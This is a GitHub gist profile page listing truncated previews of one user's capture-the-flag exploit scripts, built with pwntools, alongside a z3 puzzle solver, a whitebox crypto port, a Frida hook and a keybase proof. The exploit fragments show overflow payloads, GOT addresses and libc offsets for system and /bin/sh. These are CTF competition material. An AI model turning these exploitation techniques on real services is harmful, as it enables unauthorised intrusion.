Skip to content

Instantly share code, notes, and snippets.

View sudhackar's full-sized avatar
🎯
Focusing

Sudhakar Verma sudhackar

🎯
Focusing
118 followers · 0 following
View GitHub Profile
@sudhackar
sudhackar / easypwnie.py
Created August 20, 2016 15:37
[hackcon]easypwnie
from pwn import *
import numpy as np
import sys
'''
0x00019ad3 <+243>: mov DWORD PTR [esp],eax
0x00019ad6 <+246>: call 0x32f50 <exit>
p system
@sudhackar
sudhackar / diapers.py
Created September 11, 2016 17:27
ASIS CTF finals Diaper Simulator pwn-2
from pwn import *
local=len(sys.argv)==1
'''
0804b00c 00000107 R_386_JUMP_SLOT 00000000 printf
0804b010 00000207 R_386_JUMP_SLOT 00000000 memcpy
0804b014 00000307 R_386_JUMP_SLOT 00000000 __stack_chk_fail
0804b018 00000407 R_386_JUMP_SLOT 00000000 fread
0804b01c 00000507 R_386_JUMP_SLOT 00000000 puts
0804b020 00000607 R_386_JUMP_SLOT 00000000 __gmon_start__
0804b024 00000707 R_386_JUMP_SLOT 00000000 exit
@sudhackar
sudhackar / keybase.md
Last active February 14, 2022 13:03
Keybase

Keybase proof

I hereby claim:

  • I am sudhackar on github.
  • I am sudhackar (https://keybase.io/sudhackar) on keybase.
  • I have a public key whose fingerprint is 285B 7686 8970 789A B6D2 EAFF E6DB 7072 7521 A3FB

To claim this, I am signing this object:

@sudhackar
sudhackar / getsocial.py
Created March 25, 2017 15:58
[MITCTF] pwn-getsocial
from pwn import *
s = remote('127.0.0.1',5000)
s.recvuntil('command:')
s.sendline('2')
s.recvuntil('overwrite?')
s.sendline('2')
s.recvuntil('tweet:')
s.sendline('A'*140+p32(0x804918c))
s.recvuntil('command:')
@sudhackar
sudhackar / maze.py
Created April 27, 2017 03:52
bof on get_input()
from pwn import *
offset___libc_start_main = 0x0000000000020740
offset_system = 0x0000000000045390
offset_dup2 = 0x00000000000f6d90
offset_read = 0x00000000000f6670
offset_write = 0x00000000000f66d0
offset_str_bin_sh = 0x18c177
bss = 0x00000000000130b8
@sudhackar
sudhackar / binarypuzzle.py
Created June 23, 2017 18:40
A solver for http://binarypuzzle.com/ puzzles based on z3 ( https://github.com/Z3Prover/z3 )
game = """
.....1...1
1......0..
..0....0..
.00...0..1
1........1
...0..1...
0....1....
.......0.0
0........0
@sudhackar
sudhackar / rhme3-exp.py
Last active February 19, 2019 06:39
rhme3 CTF exploitation on heap
from pwn import *
context(arch='amd64', os='linux', log_level='info')
system_main_arena_offset = 0x37f7e8
got_strlen = 0x603040
s = remote("pwn.rhme.riscure.com",1337)
def recv_menu():
s.recvuntil(": ")
@sudhackar
sudhackar / rhme3-whitebox.py
Last active November 14, 2018 19:59
RHME3 ctf Whitebox implemetation in pure python
dword_6661C0 = [1649885203,594050925,1581470779,-1391327847,-1611275700,-1912869808,-599971129,495688880,1480676927,-2013402532,-909651928,1320857042,210015150,-1192689802,-1425012835,-232312589,-1239741301,-1142292876,-1036574509,-1996951722,-198888713,-450216471,1280137767,8427430,-1995564639,-1761340491,731483796,1029862777,1380405299,2024325110,627735913,1179343915,-700764981,1404151492,1721939426,1016365966,-86589174,1705227488,-1290268787,-1495075486,92509344,-1091895950,-2046092117,695105889,1985694731,865175172,-549704763,966230152,543784559,-1108607888,1683309079,1220063190,1464095541,681086870,-1511787424,-2146885969,242443355,-153959166,58824356,-1861873231,-1661672626,-1762466494,41377875,-1595869338,1413829175,-1978722141,580815258,-433373973,159879336,311335354,125068117,1246713891,-1138947449,344759230,1078550063,2086488583,996177789,-607527372,2007874300,462003892,444557379,1153215454,377187403,765168784,-382846495,1621145574,-48089607,1203612380,2125118962,1103079640,1968852233,-751292467,564
@sudhackar
sudhackar / frida-socket.js
Last active June 5, 2024 02:42
frida socket hook
'use strict';
var connect = new NativeFunction(
Module.findExportByName(null, "connect"),
'int',
['int', 'pointer', 'int']
);
Interceptor.replace(connect, new NativeCallback(function (sockfd, addr, addrlen) {
console.log(sockfd, addr, addrlen);
@sudhackar
sudhackar / crypto350.py
Created September 17, 2017 20:09
[CSAW CTF 2017] solution scripts for pwn and crypto
from pwn import *
context(log_level='info')
s = remote('crypto.chal.csaw.io',1578)
def send_blob(s, data):
s.recvuntil(': ')
s.sendline(data)
print "sent", data
return